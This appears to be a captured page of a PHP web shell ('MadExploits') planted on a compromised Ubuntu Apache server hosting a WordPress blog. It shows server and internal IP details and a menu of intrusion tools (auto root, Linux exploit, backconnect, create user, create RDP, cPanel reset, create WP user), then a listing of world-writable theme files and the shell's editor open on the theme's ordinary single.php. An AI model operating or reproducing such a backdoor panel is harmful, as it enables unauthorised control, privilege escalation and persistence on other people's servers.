Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
blog /
wp-content /
themes /
baskerville /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
languages
[ DIR ]
drwxrwxrwx
widgets
[ DIR ]
drwxrwxrwx
404.php
1014
B
-rw-rw-rw-
archive.php
2.31
KB
-rw-rw-rw-
baskerville-editor-style.css
3.08
KB
-rw-rw-rw-
baskerville-gutenberg-editor-s...
7.72
KB
-rw-rw-rw-
comments.php
2.17
KB
-rw-rw-rw-
content-aside.php
257
B
-rw-rw-rw-
content-audio.php
902
B
-rw-rw-rw-
content-gallery.php
954
B
-rw-rw-rw-
content-image.php
960
B
-rw-rw-rw-
content-link.php
1.14
KB
-rw-rw-rw-
content-quote.php
1006
B
-rw-rw-rw-
content-status.php
156
B
-rw-rw-rw-
content-video.php
1.17
KB
-rw-rw-rw-
content.php
880
B
-rw-rw-rw-
footer.php
1.98
KB
-rw-rw-rw-
functions.php
25.1
KB
-rw-rw-rw-
header.php
3.5
KB
-rw-rw-rw-
image.php
2.01
KB
-rw-rw-rw-
index.php
1.62
KB
-rw-rw-rw-
license.txt
15.05
KB
-rw-rw-rw-
page.php
1.68
KB
-rw-rw-rw-
readme.txt
10.71
KB
-rw-rw-rw-
screenshot.png
310.95
KB
-rw-rw-rw-
search.php
1.55
KB
-rw-rw-rw-
searchform.php
302
B
-rw-rw-rw-
sidebar.php
1.67
KB
-rw-rw-rw-
single.php
8.31
KB
-rw-rw-rw-
style.css
64.62
KB
-rw-rw-rw-
template-archives.php
4.51
KB
-rw-rw-rw-
template-contributors.php
3.66
KB
-rw-rw-rw-
template-fullwidth.php
1.56
KB
-rw-rw-rw-
template-nosidebar.php
1.57
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : single.php
<?php get_header(); ?> <div class="wrapper section medium-padding"> <div class="section-inner"> <div class="content fleft"> <?php if ( have_posts() ) : while ( have_posts() ) : the_post(); ?> <?php gt_set_post_view(); ?> <div id="post-<?php the_ID(); ?>" <?php post_class(); ?>> <?php $format = get_post_format(); if ( $format == 'quote' || $format == 'link' || $format == 'audio' || $format == 'status' || $format == 'chat' ) : ?> <?php if ( has_post_thumbnail() ) : ?> <div class="featured-media"> <?php the_post_thumbnail( 'post-image' ); $image_caption = get_post( get_post_thumbnail_id() )->post_excerpt; if ( $image_caption ) : ?> <div class="media-caption-container"> <p class="media-caption"><?php echo $image_caption; ?></p> </div> <?php endif; ?> </div><!-- .featured-media --> <?php endif; ?> <?php endif; ?> <div class="post-header"> <?php gt_get_post_view(); ?> <?php if ( get_the_title() ) : ?> <h1 class="post-title"><a href="<?php the_permalink(); ?>" rel="bookmark" title="<?php the_title_attribute(); ?>"><?php the_title(); ?></a></h1> <?php endif; ?> </div><!-- .post-header --> <?php if ( $format == 'link' ) : ?> <div class="post-link"> <?php // Fetch post content $content = get_post_field( 'post_content', get_the_ID() ); // Get content parts $content_parts = get_extended( $content ); echo $content_parts['main']; ?> </div><!-- .post-link --> <?php elseif ( $format == 'quote' ) : ?> <div class="post-quote"> <?php // Fetch post content $content = get_post_field( 'post_content', get_the_ID() ); // Get content parts $content_parts = get_extended( $content ); echo $content_parts['main']; ?> </div> <?php elseif ( $format == 'gallery' ) : ?> <div class="featured-media"> <?php baskerville_flexslider( 'post-image' ); ?> </div><!-- .featured-media --> <?php elseif ( $format == 'video' ) : ?> <?php if ( $pos = strpos( $post->post_content, '<!--more-->' ) ) : ?> <div class="featured-media"> <?php // Fetch post content $content = get_post_field( 'post_content', get_the_ID() ); // Get content parts $content_parts = get_extended( $content ); // oEmbed part before <!--more--> tag $embed_code = wp_oembed_get( $content_parts['main'] ); echo $embed_code; ?> </div><!-- .featured-media --> <?php endif; ?> <?php elseif ( has_post_thumbnail() ) : ?> <div class="featured-media"> <?php the_post_thumbnail( 'post-image' ); $image_caption = get_post( get_post_thumbnail_id() )->post_excerpt; if ( $image_caption ) : ?> <div class="media-caption-container"> <p class="media-caption"><?php echo $image_caption; ?></p> </div> <?php endif; ?> </div><!-- .featured-media --> <?php endif; ?> <div class="post-content"> <?php if ( $format == 'link' || $format == 'quote' || $format == 'video' ) { $content = $content_parts['extended']; $content = apply_filters( 'the_content', $content ); echo $content; } else { the_content(); } wp_link_pages(); ?> <div class="clear"></div> </div><!-- .post-content --> <div class="post-meta-container"> <div class="post-author"> <div class="post-author-content"> <h4><?php the_author_meta( 'display_name' ); ?></h4> <?php if ( get_the_author_meta( 'description' ) ) { echo wpautop( get_the_author_meta( 'description' ) ); } $curauth = isset( $_GET['author_name'] ) ? get_userdatabylogin( $author_name ) : get_userdata( intval( $author ) ); ?> <div class="author-links"> <a class="author-link-posts" title="<?php _e( 'Author archive', 'baskerville' ); ?>" href="<?php echo get_author_posts_url( get_the_author_meta( 'ID' ) ); ?>"><?php _e( 'Author archive', 'baskerville' ); ?></a> <?php $author_url = get_the_author_meta( 'user_url' ); $author_url = preg_replace( '#^https?://#', '', rtrim( $author_url, '/' ) ); if ( ! empty( $author_url ) ) : ?> <a class="author-link-website" title="<?php _e( 'Author website', 'baskerville' ); ?>" href="<?php the_author_meta( 'user_url' ); ?>"><?php _e( 'Author website', 'baskerville' ); ?></a> <?php endif; $author_mail = get_the_author_meta( 'email' ); $show_mail = get_the_author_meta( 'showemail' ); if ( ! empty( $author_mail ) && ( $show_mail == "yes" ) ) : ?> <a class="author-link-mail" title="<?php echo $author_mail; ?>" href="mailto:<?php echo $author_mail ?>"><?php echo $author_mail; ?></a> <?php endif; $author_twitter = get_the_author_meta( 'twitter' ); if ( ! empty( $author_twitter ) ) : ?> <a class="author-link-twitter" title="<?php printf( __( '@%s on Twitter', 'baskerville' ), $author_twitter ); ?>" href="http://www.twitter.com/<?php echo $author_twitter; ?>"><?php printf( __( '@%s on Twitter', 'baskerville' ), $author_twitter ); ?></a> <?php endif; ?> </div><!-- .author-links --> </div><!-- .post-author-content --> </div><!-- .post-author --> <div class="post-meta"> <p class="post-date"><?php the_time( get_option( 'date_format' ) ); ?></p> <?php if ( function_exists( 'zilla_likes' ) ) zilla_likes(); ?> <p class="post-categories"><?php the_category( ', ' ); ?></p> <?php if ( has_tag() ) : ?> <p class="post-tags"><?php the_tags( '', ', ' ); ?></p> <?php endif; ?> <div class="clear"></div> <div class="post-nav"> <?php $prev_post = get_previous_post(); if ( ! empty( $prev_post )): ?> <a class="post-nav-prev" title="<?php printf( __( 'Previous post: %s', 'baskerville' ), get_the_title( $prev_post->ID ) ); ?>" href="<?php echo get_permalink( $prev_post->ID ); ?>"><?php _e( 'Previous post', 'baskerville' ); ?></a> <?php endif; $next_post = get_next_post(); if ( ! empty( $next_post ) ) : ?> <a class="post-nav-next" title="<?php printf( __( 'Next post: %s', 'baskerville' ), get_the_title( $next_post->ID ) ); ?>" href="<?php echo get_permalink( $next_post->ID ); ?>"><?php _e( 'Next post', 'baskerville' ); ?></a> <?php endif; ?> <?php edit_post_link( __( 'Edit post', 'baskerville' ) ); ?> <div class="clear"></div> </div> </div><!-- .post-meta --> <div class="clear"></div> </div><!-- .post-meta-container --> <?php comments_template( '', true ); ?> <?php endwhile; endif; ?> </div><!-- .post --> </div><!-- .content --> <?php get_sidebar(); ?> <div class="clear"></div> </div><!-- .section-inner --> </div><!-- .wrapper --> <?php get_footer(); ?>
Close